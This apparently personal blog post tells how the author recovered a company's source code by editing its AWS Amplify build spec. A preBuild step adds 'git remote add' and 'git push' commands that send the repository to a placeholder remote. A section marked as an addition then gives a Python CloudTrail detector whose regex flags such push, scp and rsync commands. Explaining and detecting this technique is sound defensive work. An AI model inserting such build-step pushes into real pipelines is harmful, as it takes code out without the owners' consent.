Abílio Azevedo.

The day I recovered the company's source code

Abílio Azevedo

I wrote this article for the Revelo community. You can access it in Portuguese here. The English version is below.

TLDR

This article details the experience of recovering lost source code for a company whose application was connected to AWS Amplify. By changing the amplify.yml file, it was possible to push the source code to a Git repository during the build process. We will explore how Amplify works, focusing on the security aspects and detailing how the source code is exposed at build time.

As developers, we run into hassles on a daily basis: a company contacted me for some freelance "small tweaks" work, but they didn't have access to the source code written by the previous developer 😅. So, would you take on the project? Tell them to start from scratch? Try to recover the source code?

Scenario

The source code was hosted on GitHub and deployed on AWS through Amplify. We didn't have access to the repository, but we did have access to the AWS dashboard.

Theory

At some point the code leaves GitHub and goes to AWS to be built and hosted. So we can get access to it there: there is light at the end of the tunnel!

What is AWS Amplify?

AWS Amplify is a set of tools and services that allow developers to build scalable and secure applications in the cloud. It provides an easy-to-use interface to manage backend and frontend resources, including authentication, APIs, storage, and hosting.

You can start using Amplify by setting up a repository for your source code.

[Image: Amplify hosting]

Notice that you need to authorize AWS Amplify to read your code and to write the amplify.yml file. This file controls the build and deploy process in Amplify and can be customized to meet specific project needs.

[Image: Amplify installation]

Source Code Recovery

As we have seen, the source code is exposed to AWS Amplify so that the build can run. In other words, don't connect your repository to just any service or any account. In this case, the previous developer who was providing the service believed his code was inaccessible. We know that this is not true.

The build settings live in a yml file and can be modified from the AWS dashboard or from the repository itself, as we can see in the following image:

[Image: Amplify build settings]

As I didn't have access to the repository, I modified this file through the AWS dashboard the company had access to, and included a step before the build that pushed all the code to an empty Git repository, thereby preserving the entire history of code changes.

version: 1
frontend:
  phases:
    preBuild:
      commands:
        # runs before the normal build, inside the clone Amplify made of the repository
        - echo 'Enviando código fonte para o repositório Git alternativo'
        - git remote add alternate-repo <URL_DO_REPOSITÓRIO_ALTERNATIVO>
        - git push alternate-repo master
    # the existing build phase and artifacts settings stay unchanged

With this we found out that the developer was outsourcing the service to someone else 🤡.

Note: if outsourcing was authorized in the contract, everything is fine. The guy went silent when he found out we had been able to access the source code. But that's it, folks: pay attention to the possibilities, and understand how the tools work and the concepts behind them so you can use them in the best way and get out of hassles like this, always ethically.
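The flip side of the trick above is that anyone who can edit the build spec in the Amplify console can do the same to your code, so those edits are worth alerting on. The detector below is an added example, not code from the post: it reads CloudTrail records for Amplify's UpdateApp and UpdateBranch calls (both carry the new spec in the buildSpec request parameter), reports each build-spec change, and lists any commands that push the checkout somewhere else. The records are constructed for the example; the account id, app id and remote URL are placeholders.

```python
import re

# Build-spec lines that move the checked-out tree somewhere outside Amplify.
EXFIL_PATTERN = re.compile(r"git\s+(remote\s+add|push|bundle)|\b(scp|rsync)\s", re.I)

def suspicious_commands(build_spec: str) -> list:
    """Return the lines of an amplify.yml that match EXFIL_PATTERN."""
    return [ln.strip() for ln in build_spec.splitlines() if EXFIL_PATTERN.search(ln)]

def flag_build_spec_changes(records: list) -> list:
    """One finding per CloudTrail record that rewrote an Amplify build spec."""
    findings = []
    for rec in records:
        if rec.get("eventSource") != "amplify.amazonaws.com":
            continue
        if rec.get("eventName") not in ("UpdateApp", "UpdateBranch"):
            continue
        params = rec.get("requestParameters") or {}
        spec = params.get("buildSpec")
        if not spec:
            continue  # some other app/branch setting changed, not the build spec
        findings.append({
            "time": rec.get("eventTime"),
            "actor": (rec.get("userIdentity") or {}).get("arn"),
            "app": params.get("appId"),
            "event": rec["eventName"],
            "commands": suspicious_commands(spec),
        })
    return findings

# Constructed sample records (not real CloudTrail data): a benign spec edit,
# an edit that adds the push step from the post, and an unrelated event.
SAMPLE_RECORDS = [
    {"eventTime": "2023-05-01T10:00:00Z", "eventSource": "amplify.amazonaws.com",
     "eventName": "UpdateApp", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {"appId": "d1example", "buildSpec":
         "version: 1\nfrontend:\n  phases:\n    build:\n      commands:\n        - npm ci\n        - npm run build\n"}},
    {"eventTime": "2023-05-01T11:30:00Z", "eventSource": "amplify.amazonaws.com",
     "eventName": "UpdateBranch", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/contractor"},
     "requestParameters": {"appId": "d1example", "branchName": "main", "buildSpec":
         "version: 1\nfrontend:\n  phases:\n    preBuild:\n      commands:\n"
         "        - git remote add alternate-repo https://example.invalid/repo.git\n"
         "        - git push alternate-repo master\n"}},
    {"eventTime": "2023-05-01T12:00:00Z", "eventSource": "amplify.amazonaws.com",
     "eventName": "StartJob", "userIdentity": {"arn": "arn:aws:iam::123456789012:user/dev"},
     "requestParameters": {"appId": "d1example", "branchName": "main"}},
]

if __name__ == "__main__":
    for f in flag_build_spec_changes(SAMPLE_RECORDS):
        print(f["time"], f["event"], f["actor"], f["commands"] or "no push-style commands")
```

Every build-spec change is reported, not only the ones with push commands, because a legitimate edit from an unexpected principal is the signal that matters most.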

That is All Folks

